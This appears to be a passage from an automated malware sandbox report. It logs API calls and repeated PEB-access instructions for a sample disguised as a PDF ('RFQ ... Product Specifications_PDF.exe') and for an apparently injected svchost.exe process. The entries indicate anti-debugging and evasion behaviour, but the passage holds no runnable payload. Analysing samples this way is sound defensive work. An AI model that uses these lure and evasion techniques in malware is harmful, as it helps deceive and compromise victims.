          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00ABEAA2 BlockInput,0_2_00ABEAA2
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A72622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A72622
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00A442DE
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A64CE8 mov eax, dword ptr fs:[00000030h]0_2_00A64CE8
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_0141F1F0 mov eax, dword ptr fs:[00000030h]0_2_0141F1F0
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_0141F190 mov eax, dword ptr fs:[00000030h]0_2_0141F190
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_0141DB50 mov eax, dword ptr fs:[00000030h]0_2_0141DB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325F2D0 mov eax, dword ptr fs:[00000030h]2_2_0325F2D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260124 mov eax, dword ptr fs:[00000030h]2_2_03260124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03231131 mov eax, dword ptr fs:[00000030h]2_2_03231131
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03231131 mov eax, dword ptr fs:[00000030h]2_2_03231131
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B136 mov eax, dword ptr fs:[00000030h]2_2_0322B136
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B136 mov eax, dword ptr fs:[00000030h]2_2_0322B136
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B136 mov eax, dword ptr fs:[00000030h]2_2_0322B136
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B136 mov eax, dword ptr fs:[00000030h]2_2_0322B136
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h]2_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h]2_2_032F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C9179 mov eax, dword ptr fs:[00000030h]2_2_032C9179
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03305152 mov eax, dword ptr fs:[00000030h]2_2_03305152
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h]2_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229148 mov eax, dword ptr fs:[00000030h]2_2_03229148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229148 mov eax, dword ptr fs:[00000030h]2_2_03229148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229148 mov eax, dword ptr fs:[00000030h]2_2_03229148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229148 mov eax, dword ptr fs:[00000030h]2_2_03229148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C3140 mov eax, dword ptr fs:[00000030h]2_2_032C3140
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C3140 mov eax, dword ptr fs:[00000030h]2_2_032C3140
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C3140 mov eax, dword ptr fs:[00000030h]2_2_032C3140
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03237152 mov eax, dword ptr fs:[00000030h]2_2_03237152
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h]2_2_0322C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h]2_2_032C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]2_2_03236154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]2_2_03236154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E11A4 mov eax, dword ptr fs:[00000030h]2_2_032E11A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E11A4 mov eax, dword ptr fs:[00000030h]2_2_032E11A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E11A4 mov eax, dword ptr fs:[00000030h]2_2_032E11A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E11A4 mov eax, dword ptr fs:[00000030h]2_2_032E11A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324B1B0 mov eax, dword ptr fs:[00000030h]2_2_0324B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03270185 mov eax, dword ptr fs:[00000030h]2_2_03270185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03287190 mov eax, dword ptr fs:[00000030h]2_2_03287190
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032351ED mov eax, dword ptr fs:[00000030h]2_2_032351ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D71F9 mov esi, dword ptr fs:[00000030h]2_2_032D71F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h]2_2_033061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h]2_2_032601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326D1D0 mov eax, dword ptr fs:[00000030h]2_2_0326D1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326D1D0 mov ecx, dword ptr fs:[00000030h]2_2_0326D1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033051CB mov eax, dword ptr fs:[00000030h]2_2_033051CB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h]2_2_0322A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h]2_2_0322C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F903E mov eax, dword ptr fs:[00000030h]2_2_032F903E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F903E mov eax, dword ptr fs:[00000030h]2_2_032F903E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F903E mov eax, dword ptr fs:[00000030h]2_2_032F903E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F903E mov eax, dword ptr fs:[00000030h]2_2_032F903E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h]2_2_032B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B106E mov eax, dword ptr fs:[00000030h]2_2_032B106E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03305060 mov eax, dword ptr fs:[00000030h]2_2_03305060
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov ecx, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241070 mov eax, dword ptr fs:[00000030h]2_2_03241070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h]2_2_0325C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AD070 mov ecx, dword ptr fs:[00000030h]2_2_032AD070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232050 mov eax, dword ptr fs:[00000030h]2_2_03232050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D705E mov ebx, dword ptr fs:[00000030h]2_2_032D705E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D705E mov eax, dword ptr fs:[00000030h]2_2_032D705E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B052 mov eax, dword ptr fs:[00000030h]2_2_0325B052
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h]2_2_032B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h]2_2_032C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h]2_2_032F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h]2_2_032F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323208A mov eax, dword ptr fs:[00000030h]2_2_0323208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BD080 mov eax, dword ptr fs:[00000030h]2_2_032BD080
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BD080 mov eax, dword ptr fs:[00000030h]2_2_032BD080
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D08D mov eax, dword ptr fs:[00000030h]2_2_0322D08D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03235096 mov eax, dword ptr fs:[00000030h]2_2_03235096
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325D090 mov eax, dword ptr fs:[00000030h]2_2_0325D090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325D090 mov eax, dword ptr fs:[00000030h]2_2_0325D090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326909C mov eax, dword ptr fs:[00000030h]2_2_0326909C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032550E4 mov eax, dword ptr fs:[00000030h]2_2_032550E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032550E4 mov ecx, dword ptr fs:[00000030h]2_2_032550E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0322A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h]2_2_032380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h]2_2_032B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h]2_2_0322C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h]2_2_032720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov ecx, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov ecx, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov ecx, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov ecx, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C0 mov eax, dword ptr fs:[00000030h]2_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033050D9 mov eax, dword ptr fs:[00000030h]2_2_033050D9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AD0C0 mov eax, dword ptr fs:[00000030h]2_2_032AD0C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AD0C0 mov eax, dword ptr fs:[00000030h]2_2_032AD0C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h]2_2_032B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032590DB mov eax, dword ptr fs:[00000030h]2_2_032590DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF72E mov eax, dword ptr fs:[00000030h]2_2_032EF72E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03233720 mov eax, dword ptr fs:[00000030h]2_2_03233720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324F720 mov eax, dword ptr fs:[00000030h]2_2_0324F720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324F720 mov eax, dword ptr fs:[00000030h]2_2_0324F720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324F720 mov eax, dword ptr fs:[00000030h]2_2_0324F720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F972B mov eax, dword ptr fs:[00000030h]2_2_032F972B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B73C mov eax, dword ptr fs:[00000030h]2_2_0330B73C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B73C mov eax, dword ptr fs:[00000030h]2_2_0330B73C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B73C mov eax, dword ptr fs:[00000030h]2_2_0330B73C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B73C mov eax, dword ptr fs:[00000030h]2_2_0330B73C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229730 mov eax, dword ptr fs:[00000030h]2_2_03229730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229730 mov eax, dword ptr fs:[00000030h]2_2_03229730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03265734 mov eax, dword ptr fs:[00000030h]2_2_03265734
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323973A mov eax, dword ptr fs:[00000030h]2_2_0323973A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323973A mov eax, dword ptr fs:[00000030h]2_2_0323973A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h]2_2_0326273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h]2_2_032AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03237703 mov eax, dword ptr fs:[00000030h]2_2_03237703
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03235702 mov eax, dword ptr fs:[00000030h]2_2_03235702
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03235702 mov eax, dword ptr fs:[00000030h]2_2_03235702
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h]2_2_0326C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230710 mov eax, dword ptr fs:[00000030h]2_2_03230710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260710 mov eax, dword ptr fs:[00000030h]2_2_03260710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326F71F mov eax, dword ptr fs:[00000030h]2_2_0326F71F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326F71F mov eax, dword ptr fs:[00000030h]2_2_0326F71F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B765 mov eax, dword ptr fs:[00000030h]2_2_0322B765
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B765 mov eax, dword ptr fs:[00000030h]2_2_0322B765
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B765 mov eax, dword ptr fs:[00000030h]2_2_0322B765
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B765 mov eax, dword ptr fs:[00000030h]2_2_0322B765
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238770 mov eax, dword ptr fs:[00000030h]2_2_03238770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243740 mov eax, dword ptr fs:[00000030h]2_2_03243740
